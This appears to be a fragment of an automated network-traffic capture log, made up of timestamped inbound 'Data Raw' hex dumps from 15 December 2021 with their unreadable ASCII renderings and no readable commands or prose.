a1 fd 7d a9 04 5f 30 9f 3f 04 fc 18 ff 5b 4a 51 d0 02 04 50 f9 36 de 6a de 66 6a 5b 36 50 6e 4c e4 98 10 b9 17 6b cb ea da 73 6d 29 5a 07 82 11 2e eb dc dc 6b 03 35 e8 6c a0 c6 e7 a5 30 d0 Data Ascii: jr{&[@~]S7ZoZN0]2BdShb/`qP@N263RzHtM2M(8V44`'e $eJ{(o:VJ4zM0.]<\|9cLBK)=}_0?[JQP6jfj[6PnLksm)Z.k5l0
2021-12-15 13:13:48 UTC	106	IN	Data Raw: 42 67 a0 ef cc 03 31 d8 d8 fb 94 2b 33 c2 8e 46 d8 ca 90 4a e7 f7 92 fc f9 df f2 24 82 1c 20 75 8d ae 0c 88 e6 90 30 3c 0c 49 0a c4 7a d3 8d d8 c7 d8 d0 7d 26 dc 74 f7 39 95 17 76 f1 fa d3 db f3 23 71 57 ef 18 6e d5 27 d6 d3 b6 a4 91 b3 7b 57 3f 1a 9f a5 7c 7a 4b 29 0c 0b a0 75 ad d7 f5 80 23 38 1a a3 14 c0 81 0b ff 5c 81 fe 4f 54 c2 79 55 98 c5 03 75 3a 6e ae 20 cb 62 1f 1c a8 e0 dd 94 1e 7b cf c3 1b 7b b0 3a ae 8e 1e a9 ca 2b ea 66 28 3d 66 72 c0 b5 a8 eb 8e 0e 2e 2e 74 d2 04 45 44 ea da 24 5d 27 8d 5b 8d e3 0e 87 83 80 9b 75 37 39 37 89 e6 56 85 01 82 7f a7 69 a6 e3 34 3b 83 1d 71 f1 be 51 3a 1b 7c 47 82 a9 32 04 cc 1b 46 7e 22 17 39 f4 56 d1 a9 73 c6 f4 71 50 08 2a aa 6a 4f 29 a9 f5 9d ad 00 1c 65 1d 65 98 ad 35 96 f4 f2 ee 6d 17 5c 50 cc 36 56 58 0f Data Ascii: Bg1+3FJ$ u0<Iz}&t9v#qWn'{W?\|zK)u#8\OTyUu:n b{{:+f(=fr..tED$]'[u797Vi4;qQ:\|G2F~"9VsqP*jO)ee5m\P6VX
2021-12-15 13:13:48 UTC	107	IN	Data Raw: b0 76 0d 89 d2 11 f0 75 98 e5 5d 9a 28 45 21 0b 7e f5 98 eb 9b 9f 7c e5 12 92 a2 b3 4f 4a 4d dc 77 df 34 fd eb fc f6 21 c5 da 7b d9 07 c1 ee a0 bf 8a 69 7d 8d 6f ff 48 fd 93 79 ec c7 86 18 e1 58 e8 cd 49 39 cb 77 5c 28 10 a1 7c 57 6a 46 b5 a3 f0 c2 8f c9 f6 61 7c 52 95 33 d2 c0 f5 40 d5 a1 15 5b d5 2f fe a5 13 7c ba 58 8f cb 81 10 72 4c 8c 07 00 ad 16 d3 40 8e 2f 8c 02 fe 51 2b b5 3e ca b3 de 0d 18 a6 30 ca 13 f4 1c aa 8b c4 eb ae 45 23 82 59 77 29 b8 7f 9f 88 dd ff 76 ce 38 29 16 e7 dc 40 74 35 1d 7e 85 b5 34 11 05 0e 75 55 c6 e5 75 a5 60 2c 12 66 f3 c7 ac 3b b0 1b 3f d2 df d8 db e6 94 a1 63 1b ae d2 c7 be f7 be 38 2c 92 04 c7 fc f4 44 f8 b3 25 9b 62 64 b0 55 1d 9d 5c 01 2b b5 de d3 fd 1b f2 bd ab 13 b0 8f 1d ac 0f a0 94 cb 69 ca d6 40 55 93 b0 7a f1 df Data Ascii: vu](E!~\|OJMw4!{i}oHyXI9w\(\|WjFa\|R3@[/\|XrL@/Q+>0E#Yw)v8)@t5~4uUu`,f;?c8,D%bdU\+i@Uz
2021-12-15 13:13:48 UTC	108	IN	Data Raw: 2e 0e d7 b4 dd c1 15 bd 2d 1c 6a 4a 7a 4e 95 71 04 42 ee d3 45 d9 58 5c 2e f7 69 2e 4f 7e 81 8d 90 a2 a0 0d 9c 8e b0 ad 86 ed 69 f9 c5 df dd fe 51 7b f9 20 5e b8 dc 6d 32 8b bd b6 e1 ec 40 91 df 85 e6 94 81 64 38 24 89 f8 ef e2 ad d0 73 7d d9 21 88 a7 95 50 5f 7f 9e 05 e8 f9 e6 59 0a 78 00 d3 cb 43 9c 1a f6 b4 9f 7e bb 2c 44 fa e7 eb 90 97 2c eb 2f cc 67 29 44 3f 56 5b 35 49 8e a8 3e 55 35 d2 a1 16 12 79 c8 b5 7a d2 49 bc b7 7e 47 32 5f a7 b4 18 d4 cb 1a 9d d0 e3 a1 23 0f d6 5d 98 ff c1 09 aa 29 be 68 16 96 d8 7e 67 a9 08 9c fa c4 1b 91 53 1f 95 ae e3 bf d7 dd 8e a8 76 5e 5c e1 74 3c e8 cf 18 a2 21 d7 71 c6 59 54 66 ce ca e6 b3 f1 2a cb 66 be a8 81 2b b0 6b 4e f8 50 af 66 36 4c 98 2f 22 68 eb d4 6d c2 ee 19 fc 7b 63 fe 69 3c fc aa 37 f6 a7 c2 b7 3c c2 d6 Data Ascii: .-jJzNqBEX\.i.O~iQ{ ^m2@d8$s}!P_YxC~,D,/g)D?V[5I>U5yzI~G2_#])h~gSv^\t<!qYTf*f+kNPf6L/"hm{ci<7<
2021-12-15 13:13:48 UTC	109	IN	Data Raw: 6b 4d 1d cb 2e ce 65 28 d2 08 f6 4e 5a 00 d3 66 b1 5d 88 1a 15 dc 48 c9 f1 84 46 23 66 a6 72 04 07 62 37 93 e5 2d a9 3e f4 5c 11 3d 3f 43 f1 67 41 bb ea b3 95 43 92 a7 f1 f2 9e 81 5c 3b 9c 13 06 32 66 17 c2 ab 18 13 6d a1 60 08 c1 59 42 b7 db f3 2f de 7a 04 1d 24 19 3d c3 92 e0 ba 41 51 1a ae 3c f3 93 5d fb 7c c8 cd 2d c8 21 86 c0 cb 68 77 4f 38 eb 0b a9 80 21 57 da 61 48 f1 89 34 58 8a a8 71 5f e7 92 d8 03 5d 77 64 18 8a 73 1b 21 06 c0 dd 2b 5b b6 1e de 11 06 3e e8 35 11 e2 2f 5e 7c e0 ac 81 d3 8e 0d 5b 14 fd ca 3e 4d 46 e0 8e a8 4d 98 7a 96 47 6a db 3b 38 79 16 a9 4b 39 29 d7 af 82 3e 07 ca d6 d1 2d c0 5c e3 6c 51 79 bb 6b 99 41 eb 46 72 62 a0 34 ff 45 c1 90 3b 10 71 1d 1a af 35 3c 6b 0d 05 96 2d 43 5f c2 7d 90 83 16 9e 3b 40 be e0 aa 98 23 c7 31 1d dc Data Ascii: kM.e(NZf]HF#frb7->\=?CgAC\;2fm`YB/z$=AQ<]\|-!hwO8!WaH4Xq_]wds!+[>5/^\|[>MFMzGj;8yK9)>-\lQykAFrb4E;q5<k-C_};@#1
2021-12-15 13:13:48 UTC	111	IN	Data Raw: 73 7d 01 3a 94 5e 0d a9 ae f9 1b 61 2d 2c 55 ed c0 bf e0 09 21 13 6a 75 17 f3 c5 1d 03 7e 0b 2c 4e d3 c9 42 f5 7d 7c a3 d4 16 92 2c 12 de 87 56 b4 d8 20 1f 03 c2 57 32 52 02 57 e6 d1 0a 8b 41 7d 59 a8 73 af 63 87 7b 11 9e 84 b1 42 e8 c8 31 6d a2 ae 60 df 5c 9b 10 74 de 66 44 86 b3 5e f3 71 d5 9c c8 e8 9b 56 b6 26 35 cd 93 e5 85 ac fa d2 0b ff e7 09 71 77 9b 9a f1 43 a2 17 6a 3b 4c 4a 17 4f 1e 94 fe 45 a6 db 14 94 16 4a 7a d1 57 48 ea 86 8f 4c dd b8 89 da 72 ce ea 62 2e 94 38 c5 18 24 22 ca c5 c0 87 ec b8 66 26 36 7e 4b 24 e9 1e 2d f7 cb 76 ba 2b 92 67 d8 0a b0 f4 31 9f da 5a 46 5b d4 ae 5a 83 18 13 e8 ac 00 9f c1 14 dd a5 14 9d 83 19 e8 eb 22 8c 22 ee 74 22 d5 c3 31 82 c8 0f c8 97 9c 4e a9 9f 47 78 68 da 29 d5 5e 61 de d1 60 1d 73 c4 68 af a5 a9 0f eb 52 Data Ascii: s}:^a-,U!ju~,NB}\|,V W2RWA}Ysc{B1m`\tfD^qV&5qwCj;LJOEJzWHLrb.8$"f&6~K$-v+g1ZF[Z""t"1NGxh)^a`shR
2021-12-15 13:13:48 UTC	112	IN	Data Raw: 71 17 f3 97 2e 00 a1 28 bf 12 92 07 87 d7 85 21 75 75 a7 98 81 6a 91 8a 46 87 71 ef ea 26 b8 0b 4e b0 52 d3 d9 58 f1 95 11 40 80 4f b7 1f 33 98 d0 f8 75 06 f6 3e c8 6b 67 8d ca ee 60 8c 30 1e 2b 16 88 f3 80 0d 63 bd c3 ec b2 43 61 77 52 33 df 82 51 dc e1 c7 f0 be d1 39 fc 14 11 62 24 86 82 b5 fd 13 89 3b ab 6b 3e e4 62 a1 c9 8b 05 18 94 49 b9 40 a1 24 7f bb 4d 87 75 3a 0d 86 ce c8 9e b4 32 47 69 10 17 d5 b7 37 fa ad df 63 59 b0 09 45 d9 09 84 d8 4c b8 a6 98 af 78 18 4c 4c a3 58 42 03 97 3b c8 c8 2e f6 cb 14 3c 22 03 ab 3f 9a 12 df e4 c5 89 05 c0 51 b2 de ea 98 17 bf 38 e4 6f 85 99 51 34 3b 38 3c df 18 05 eb a4 a3 1e f7 68 74 da 60 15 9b 90 4a 32 e0 da 13 1a d1 29 f8 4f fc ed f7 b1 a2 54 7f e0 ac 0b 04 0b 24 83 6b cf ea a6 31 5b 86 01 26 dd f7 c7 c9 2a ea Data Ascii: q.(!uujFq&NRX@O3u>kg`0+cCawR3Q9b$;k>bI@$Mu:2Gi7cYELxLLXB;.<"?Q8oQ4;8<ht`J2)OT$k1[&*
2021-12-15 13:13:48 UTC	113	IN	Data Raw: 59 52 8c 4f d9 fd 19 5d cd a2 3b b8 42 43 4f 51 a2 7b 65 cd 5c 48 0c d9 17 e9 92 63 d3 14 a2 38 a0 09 be fa 41 76 23 85 df d9 c0 41 2f 85 e7 27 1f 12 8d 24 78 1c c9 33 e5 e8 30 5d c8 d5 5e 05 ed 10 94 da b7 cb 0e bd 59 75 9f 0b 1d ea 9b cf 00 dd b6 b8 f4 21 77 14 a2 69 f0 a3 6b 26 5b e8 68 8c cf 22 58 33 e6 56 88 db 59 52 ea e3 22 76 3b cf be d7 fb d7 e7 59 78 8f 16 25 4b 22 76 4e 38 14 f4 8a a8 3e 06 26 2e 09 0a ff 9b 45 1c 77 e6 a3 a8 dc 2f ae 29 e4 ed b5 69 b8 9d ca ac 3c e4 2c f1 b2 e1 49 98 17 4d 5f de d1 4d 03 0d 6d 37 00 d1 2d 71 9c ac 41 40 02 0c 4e b8 9c 34 af 3c 8f 9a 95 ce af 66 38 fc 32 d1 ea dd 38 f2 d8 0c f6 24 23 a5 92 0d 6d b2 c4 d1 1f 26 f0 0d 4d 06 0d 23 16 0f 54 2b e4 59 6d 3a 57 be 2a b0 e3 90 44 b8 40 9d 4b bc fe 85 f9 a0 06 2f 46 8a Data Ascii: YRO];BCOQ{e\Hc8Av#A/'$x30]^Yu!wik&[h"X3VYR"v;Yx%K"vN8>&.Ew/)i<,IM_Mm7-qA@N4<f828$#m&M#T+Ym:W*D@K/F
2021-12-15 13:13:48 UTC	114	IN	Data Raw: d7 24 1c 6c e9 3d 11 57 fc 27 10 51 74 37 98 61 1f ca 82 32 89 fd 02 65 c7 61 a1 1c 12 ed df 5f e3 34 88 b6 32 d5 99 b0 8e e4 0f dc 58 56 01 99 bd d0 5e 17 39 e8 e3 a0 07 43 59 f8 bb 79 76 24 ec 50 b2 de 09 7d dd c6 40 78 ab e1 1f 36 61 d9 85 80 d2 24 c2 f8 3b a7 77 1c e3 58 40 50 62 ea b3 ea 11 8c 65 01 ee ec 3a 12 1f 42 37 cb 34 01 1d 6e a2 19 46 9d 40 eb 13 04 2b 8e 33 67 7d ad 67 99 f4 17 20 75 6f cb 74 d9 57 0d 2a 71 da 86 df b2 9b f7 59 75 a9 39 da 87 9c 60 7f ee e2 22 9f 7a b3 a4 23 b7 9d 96 aa c1 43 de 06 22 b8 30 4d 12 8d 82 bd 4d 37 1c 6a 4e 60 31 c5 8f 16 95 3b 2d 53 d4 3b 81 39 29 63 25 18 26 fe f4 f2 55 c3 1b 28 e6 d3 96 8f 1d 57 38 25 dc ec d2 81 37 aa e2 82 ac 2e 70 f2 2f 51 e9 7e 66 f9 bf e8 be a8 e6 1c f5 61 90 66 68 b3 3d 35 27 01 48 ba Data Ascii: $l=W'Qt7a2ea_42XV^9CYyv$P}@x6a$;wX@Pbe:B74nF@+3g}g uotW*qYu9`"z#C"0MM7jN`1;-S;9)c%&U(W8%7.p/Q~fafh=5'H
2021-12-15 13:13:48 UTC	115	IN	Data Raw: 49 d5 13 1d ff f9 74 0f a3 ae c5 85 99 5f f2 57 09 c6 4b 16 bd d4 02 1b 21 37 e9 49 44 26 b8 30 5c 54 dd eb 6d 53 87 ed 8f 8d a0 d7 a0 5e ea 48 9b 60 94 2b 8d 3c 55 67 e0 b7 b6 d9 53 bc e0 35 22 38 b7 17 6b 8b e3 46 6f 72 77 8e de 1a 0c b4 33 1b a3 8a 70 0a 48 ed ce c4 56 bd 71 94 9b 01 51 dd e5 ea ab 4d f6 41 19 c0 cf a0 46 0d 72 bc 19 1e 26 44 4f 89 af bd ce 37 2a 0e 73 75 85 54 6b 81 0e c2 9d fa 05 cb 69 d4 9c 93 68 de c4 1d 60 75 a5 78 64 2b f3 10 aa c3 76 49 01 1b ad 3c fd 64 65 51 69 0c 01 89 74 39 6e 7e 6f cd f0 ca 28 19 f8 b2 af 2c 9b 23 04 09 cb 9a 06 fc 7d 22 a3 9b 26 d9 4d a4 6e 8b 4b 89 fd 3f 55 9c 80 6e 67 59 a5 3d 15 ff e0 c8 9f 38 25 cd 1e d7 01 9d 13 5a 86 7c cf 8f 26 ab ed 69 32 a8 93 17 4b bf e1 67 c1 c3 40 19 a1 cd b8 f6 b0 fe 3d 97 86 Data Ascii: It_WK!7ID&0\TmS^H`+<UgS5"8kForw3pHVqQMAFr&DO7*suTkih`uxd+vI<deQit9n~o(,#}"&MnK?UngY=8%Z\|&i2Kg@=
2021-12-15 13:13:48 UTC	117	IN	Data Raw: dd 8b 83 9f 68 30 ee b7 4a dc 87 5d f5 87 5d a5 cc ad f7 d5 ca ac 6f 9a ee 9e 39 af 7f 67 94 17 e0 8b b7 e3 56 b6 c9 9c 27 97 6b b5 60 be 2b 81 d8 d3 9b f3 18 3b 70 23 ad 0b ae 1e 8d 71 b9 28 7c c4 68 e8 18 a5 f7 42 69 79 32 89 92 7b 6e 38 18 12 99 19 16 e2 a8 79 d7 8c 00 7e 76 ff 43 b1 ae ce fb 86 b4 c6 52 4d 26 0e cb 9e 80 f8 70 86 a5 7b 59 85 35 b6 36 fc 03 ca 2e 8f 0d e3 82 f4 7d 32 fc 44 cb f8 ae e1 ec 9f 7f b9 1d 52 e5 81 21 00 7c 0b a8 19 42 56 1f c3 04 e0 5e 6c 17 32 75 b5 f2 85 9d 6d f4 d0 de a1 ba 43 5e ac 53 68 9a 0f f7 41 0d c2 2b 9b 38 44 d3 eb 82 af 95 e2 84 8d ba e7 6c 8d 76 59 ec 02 08 d3 9f f4 f7 8f 5b 86 d7 94 20 5e 2f 3f 06 8a d3 25 65 7a 03 18 c5 d5 3d c5 f5 82 c5 ea 18 43 37 9f 74 b4 ea 93 3f 7f fa d1 18 56 cd f4 35 bc 95 12 b0 ba 6d Data Ascii: h0J]]o9gV'k`+;p#q(\|hBiy2{n8y~vCRM&p{Y56.}2DR!\|BV^l2umC^ShA+8DlvY[ ^/?%ez=C7t?V5m
2021-12-15 13:13:48 UTC	118	IN	Data Raw: 72 9b 4a f0 55 a4 a4 ce 4a 1c 40 3a 48 23 58 27 e7 df 97 69 7d ea 4f a5 07 55 a5 69 d8 10 dd 94 45 a0 0e 0b 83 fd c3 79 51 c1 59 f7 11 d3 db e1 0f 68 24 2b 33 1b d4 14 ed b1 51 83 65 05 41 7d a8 bb c6 9c 63 68 a7 64 b9 30 86 a2 cb 4a 4e 34 8d 1f b3 44 a3 03 a9 23 a3 61 c3 6d 58 4f cc f7 3d 32 45 fa 23 85 df aa 0a 38 0d 6d 5d b8 e2 70 50 eb 3d e7 8b 71 75 3e e0 17 8d 4f fb 41 0b 23 90 49 5a d9 c5 6b 03 3e 2b 34 67 09 68 05 16 c3 42 cf 4f 26 df 30 c6 79 cf 8b 89 cf d7 9a 71 4f bc 82 a8 5c 1e b2 38 e3 c5 67 63 27 61 61 fa 29 65 91 b8 3c ee 26 b1 06 b8 82 bf 86 ec bf dd 29 97 c5 2d 41 b0 24 7e e2 ce e7 e0 49 29 df 38 ad 22 6e c6 a9 29 d8 73 86 b0 46 65 42 77 d6 3a 1f 57 25 d4 b7 28 8c 65 18 a4 97 28 e0 e3 59 88 85 14 28 7c 2f 54 6a 32 d8 18 70 6d c9 44 a1 9e Data Ascii: rJUJ@:H#X'i}OUiEyQYh$+3QeA}chd0JN4D#amXO=2E#8m]pP=qu>OA#IZk>+4ghBO&0yqO\8gc'aa)e<&)-A$~I)8"n)sFeBw:W%(e(Y(\|/Tj2pmD
2021-12-15 13:13:49 UTC	119	IN	Data Raw: d0 f9 7b 85 1b aa 9d 49 0f 0e f7 52 77 a0 9e 79 f9 b7 ba 8a d3 c9 45 fe 2f 6c 03 70 87 f6 45 ae 3f fa e6 d8 59 2b 80 05 8b b7 e0 2a 26 b6 ee 52 dd 3c 29 fd a5 6c c2 30 47 e0 4f a1 b2 4b ae 29 ae b0 22 d9 ca 9d 2b d7 57 b7 37 a7 95 62 e8 f0 59 d4 52 29 a1 05 c1 b3 a0 48 d5 5d 82 bb 91 79 db 3d 44 2e 5a e8 e8 f4 4b 71 a5 63 7c d5 0d 32 f5 d5 5e 6f 56 6c 98 cc a0 0f 9b 70 3a 0c 26 86 f7 21 69 47 72 41 4f e2 8b 96 96 54 92 96 14 4f da 95 7f 25 31 7b fb 04 53 b8 c3 f7 1f c2 85 5f ad f5 e7 9b 13 a1 eb 7b 9a 77 e5 25 0c 21 5d 14 15 d8 ff d0 ed 3a b2 f3 3c b3 a6 c7 5e fe 4d 87 b8 00 d1 be 06 17 df 09 ce 4c a1 c4 b4 e9 c7 16 d1 fb 9d c2 ff 51 51 23 1d 42 0e e5 a9 1a 40 29 3a e7 01 71 9c a4 53 80 37 a3 3b 82 59 de fc 2c 61 8f 1a 73 9b 7b 36 c8 6f 06 66 6f 28 20 fe Data Ascii: {IRwyE/lpE?Y+*&R<)l0GOK)"+W7bYR)H]y=D.ZKqc\|2^oVlp:&!iGrAOTO%1{S_{w%!]:<^MLQQ#B@):qS7;Y,as{6ofo(
2021-12-15 13:13:49 UTC	120	IN	Data Raw: 25 67 cd c3 45 19 a3 ce fe 0e 35 bc 45 2f 3e 4a 9e dd cd 5a 8b 03 bf c0 bd 65 d0 79 c3 c4 75 36 a5 9a 0b 83 58 ea 11 48 46 1f b8 2f 1f 3e 79 95 b1 e2 24 9b a5 12 63 2f 30 bc 23 84 45 19 a5 d5 83 03 f5 2c 5b 71 bb bd a7 a9 ef 4c 75 2f 2e e4 25 6f e7 82 42 b9 64 3d e2 3d c8 65 cf 69 9e b8 c2 87 d4 d3 44 9c 76 28 ed 45 60 f2 bf e7 e9 54 de 76 01 d2 7d 1a a1 3e f9 b9 f0 27 d4 03 ad 72 cc b7 06 f6 ae 2c 6d 60 02 1f 0a 82 0e 1a 42 00 b9 9d 42 49 66 e1 68 79 71 fa af 21 cc 36 1c 8a 07 d2 ea 2b 81 02 34 2b b8 ef ff 42 09 f6 2c c9 ef 54 da 35 fe 6c b2 13 87 4d ce ee 35 bc ad 9d 87 6b 55 4c 51 ea 38 e5 1f a4 14 82 f7 36 ae cf 31 1c 4d 1d a4 8b 29 da bc 0a f6 73 08 cf 50 d7 ea cc ce e4 cb ed c4 eb 74 9c 6f 1e 72 50 db e7 7e 27 d0 02 e6 4c a8 a6 9c 9d 72 5c 57 94 81 Data Ascii: %gE5E/>JZeyu6XHF/>y$c/0#E,[qLu/.%oBd==eiDv(E`Tv}>'r,m`BBIfhyq!6+4+B,T5lM5kULQ861M)sPtorP~'Lr\W
2021-12-15 13:13:49 UTC	122	IN	Data Raw: 77 2a fa 2d 52 97 23 cb 53 e6 30 8c 10 41 52 71 e4 d5 f3 c2 6f 99 93 8f ae 7c 82 07 25 19 e8 d3 8e 17 4a 12 bf 2f ff 20 74 c0 4f 2f 72 5e 4b 68 79 3d e1 e6 b7 57 aa 74 75 b4 87 b8 3b a1 48 65 65 e9 fa c0 d6 fd 4e 6e 84 60 1b bd 7f 12 f4 29 b0 b7 50 bb 52 23 58 ca 82 9f 28 7a d7 cf 5a 20 2a 93 39 be a9 73 95 d4 14 4c 85 0b 2b 87 37 06 1e 51 b9 c8 b9 27 49 54 1a a1 62 6c 01 b3 97 04 a1 7e 73 f8 3c e5 b2 a0 90 95 24 e6 e2 3f b0 a0 3c c1 b3 37 dc 76 9e c2 df 76 db f2 d8 8b 03 2e 6d ba 53 f2 17 ed 14 c1 1f 89 af 0c 8a bf f0 6d 21 fb 26 47 c3 3a ff 07 2a 06 c7 d4 88 78 3d 18 c3 b6 02 ad 20 37 0f 0c 17 c0 5b ee 49 15 ab 8a a2 26 a6 d2 97 76 35 ad 14 8c ed 6a 59 fb 5a 67 53 9e 7a 33 fa e7 15 fd a7 b3 6c 52 7b b0 3e 98 5a 24 97 81 9b 04 24 ff a2 a6 b1 b7 21 95 f1 Data Ascii: w-R#S0ARqo\|%J/ tO/r^Khy=Wtu;HeeNn`)PR#X(zZ 9sL+7Q'ITbl~s<$?<7vv.mSm!&G:*x= 7[I&v5jYZgSz3lR{>Z$$!
2021-12-15 13:13:49 UTC	123	IN	Data Raw: 37 9a f5 3b 49 d6 75 af 8d 57 9d dd 22 81 07 64 1b 3c 97 b6 20 8b ef 2e e3 cb 4b 7b ab cb d4 1a 22 0a 61 65 92 1e 85 36 da f4 77 bc 4e be d8 6b 7b 4a 69 5f 30 9c 76 51 1e d1 4f a2 52 6f fc 86 ec 33 e1 3c e0 b0 81 a2 02 9b ff 14 63 5e c8 74 f1 f7 f4 3a f2 11 98 57 2e be 57 30 b8 85 d5 bd e3 53 6f 4e 4e 61 5d de 00 df 22 94 6b 56 f1 ae d4 5b 45 21 0b 7e 26 16 7b 98 52 00 e6 ef 35 43 19 bc da 28 99 93 8f 65 2c 7d 71 96 ff 41 52 92 70 a0 ce 9a 2e a3 8b 34 85 04 33 85 23 b6 5c 72 a0 22 2a bf ee 9c 56 c9 3b f5 9d 9f 02 44 87 d6 77 1b e6 26 db 5d 8a fd 38 3c a0 89 9a ae 32 0f 39 8c 79 41 1b 68 bb 79 5f dd b6 1b 07 4d 2c e8 d3 08 e9 5e bc ed 05 65 6b 43 62 62 97 36 7e 64 30 00 f6 17 56 e0 56 69 00 0c 01 bf 30 ca 5b 5a 18 99 cd d0 3e e3 89 a0 0a d1 97 30 8c 9d 60 Data Ascii: 7;IuW"d< .K{"ae6wNk{Ji_0vQORo3<c^t:W.W0SoNNa]"kV[E!~&{R5C(e,}qARp.43#\r"*V;Dw&]8<29yAhy_M,^ekCbb6~d0VVi0[Z>0`
2021-12-15 13:13:49 UTC	124	IN	Data Raw: d4 26 62 f1 04 bc fa 8e 33 0c 91 69 0f 64 ff e2 bc 6b 3e f3 99 aa be d4 8a 44 43 fa 65 eb 83 25 09 fc a3 63 6f e1 6d a3 7e b8 b8 f8 26 f9 f3 8f 1d 95 bb 28 07 4c b0 b9 f6 a3 2f 0e 86 65 c0 17 fb be 70 c7 d0 4d 41 30 cc 56 a4 f7 01 89 9c 0e 85 f1 97 f3 ef f4 92 e2 e6 97 b2 99 79 1f cf d7 d6 62 87 83 6c 45 f1 79 22 9c da 39 ed 8a a9 18 3b 96 ad 04 fe cf 77 33 73 ff 06 cc a8 ef 20 1e 7d 9d d7 d4 19 f9 da 35 65 a6 07 8c 85 73 ac bb a3 28 61 3b 01 8e 75 5d 9d 2d 65 0e 48 55 33 6e c7 02 3d 71 a4 8c 66 18 71 36 3d 37 ce f5 6d 7c 3e 49 09 91 28 06 87 db ea 7c c0 17 c4 51 f6 e9 eb c5 1a 4b 76 bf 77 9a 61 a0 45 7d 63 56 d6 f6 18 08 bf d7 62 2e cc 6e aa 8f e0 06 e3 7d 21 a6 ad f1 1e 5f 99 a3 0b e8 f1 38 24 12 b1 17 ae db 65 9f 2d 46 4f 03 62 6a 83 e4 91 6e a7 b8 1e Data Ascii: &b3idk>DCe%com~&(L/epMA0VyblEy"9;w3s }5es(a;u]-eHU3n=qfq6=7m\|>I(\|QKvwaE}cVb.n}!_8$e-FObjn
2021-12-15 13:13:49 UTC	125	IN	Data Raw: 56 13 76 b3 a0 ff 50 ce ec 7a 19 c8 15 d0 3b 4a 21 36 85 68 82 70 bc 95 17 1f 10 b6 1c 94 f3 1d 83 8e 87 e0 ab 99 82 72 1d e9 33 c3 81 34 5a be 58 5b ac 3f 99 c1 dd 0a 4d 02 bb 12 17 9f cb 92 a2 a2 85 0e 80 69 c0 fb 33 5b ad 90 0e 18 7d 2f 3d ef 34 9f 1f 03 77 c4 da b2 9c 06 3e 16 18 a3 81 13 e3 e6 14 ea 72 95 3d 2a a7 57 a2 99 99 25 48 da f2 f3 4b 8c 42 4c 86 4f 22 32 37 f7 20 b3 1c f8 4c af 59 da e4 ae 76 6c fe 56 fb cc 73 0e 2e ae ff 12 eb b3 b4 15 45 9d 60 cf ec 10 33 76 f8 a7 ac 39 61 50 bd 9e 35 19 77 64 0d 45 f0 b1 ae 28 f0 b2 55 e7 fe ac bb 69 51 ab b5 a3 eb b2 06 58 b2 1d 24 27 52 5b 62 54 df 87 b8 5e 6d 5c 52 bd 36 e1 0c 6e 3a 05 b0 5b 8a 58 ae c7 db 04 3a 6d af d4 49 73 50 92 c1 14 4d d4 c4 73 0f eb e8 bd 03 32 53 66 82 ee 11 d8 45 2b bc eb 9c Data Ascii: VvPz;J!6hpr34ZX[?Mi3[}/=4w>r=*W%HKBLO"27 LYvlVs.E`3v9aP5wdE(UiQX$'R[bT^m\R6n:[X:mIsPMs2SfE+
2021-12-15 13:13:49 UTC	127	IN	Data Raw: 62 d6 00 03 fd 43 b5 b2 62 7e 70 57 6e ec 17 1a b4 77 06 25 50 13 10 af 8d 34 72 6e 13 18 63 4f 2d 7d 7f d1 56 bd fb b9 9b d9 7a 7c 33 7f 80 56 91 e8 37 bd a6 e3 30 9b 47 31 a9 4c b6 08 fb ad 29 03 1c c2 e2 88 0b c4 c8 60 4f 39 d5 9a 71 ed c0 e8 91 7a 39 93 0c 03 2b 2f de f7 06 ca 0f 4e 61 b2 59 40 24 dc 32 6d bb 85 fc be c7 60 15 d5 e3 e7 ec fb 32 5c 8b 77 18 2e 0e 46 af 30 a8 2e b4 f0 5e 21 a9 bc e6 bb 93 85 60 1c be 27 64 b1 28 61 6f 39 c8 c5 1c 6c 76 3a 5a d6 04 77 3d cd 1d 4d 98 88 93 fa 36 e2 fd f5 8d ef 9d ba f4 50 8b 93 99 de cd e2 f4 4a 83 4a 86 fe ee 63 31 e6 ee c9 ee 20 4b ce c1 61 fd 4b ed c0 0b 8f ae 33 d2 d2 b6 82 88 f6 dd 49 3f 45 2a 0a 83 a8 7d 5a 58 1d c4 e1 2f bc ea 7b fa 4e 6c d8 9f 22 7f c6 61 46 c0 e5 f2 bc d5 e8 8d a5 9d 6a 44 90 e4 Data Ascii: bCb~pWnw%P4rncO-}Vz\|3V70G1L)`O9qz9+/NaY@$2m`2\w.F0.^!`'d(ao9lv:Zw=M6PJJc1 KaK3I?E*}ZX/{Nl"aFjD
2021-12-15 13:13:49 UTC	128	IN	Data Raw: 5e d8 f9 a9 5a 20 a9 9a b9 13 1a 94 8b 2b 64 83 de f2 8f 6f c6 af 3d b7 b2 fa a1 d3 2b 4b 66 d8 bb 28 05 f5 99 92 26 c9 30 18 8d 97 25 36 6a ec 78 fb 75 d5 50 49 3e 3b 12 d4 b9 7e 1f ed 10 8e 93 57 29 92 1b 23 b3 d9 a6 60 f5 2c 78 bf b6 f3 9f 79 32 c0 97 9a 7b 9e 5e 51 ff b1 4c 96 5f 13 b0 59 48 23 2c 83 c4 89 4c e5 15 3d a5 d2 fd 68 99 7e c6 2a b4 9e 03 a2 b0 97 e3 92 0d 20 b5 31 48 39 f7 07 d1 24 97 88 1a e1 a4 c5 bd fe cb 14 1f 6b 49 cf ce 5e 6c 3b 62 1a fd d5 e6 0b fe 33 d3 ad 1a 85 54 83 37 c2 01 3c 7a ec e7 fc dc 7c fa 3f 27 93 18 af 59 b0 df 4d 7b d3 fd 03 fe 15 a4 ae 76 79 f9 a8 d1 b9 20 fc af 38 a2 6a 93 9d 83 c6 ac 16 5f 7f 4d 7c dc 35 c0 ee f6 84 6a 90 2a 3f f2 a6 13 a1 6d ae b2 63 d4 41 eb 3a 18 ff 47 b4 eb 90 a4 d5 c5 24 9a 6e 44 67 de 4e 23 Data Ascii: ^Z +do=+Kf(&0%6jxuPI>;~W)#`,xy2{^QL_YH#,L=h~* 1H9$kI^l;b3T7<z\|?'YM{vy 8j_M\|5j*?mcA:G$nDgN#
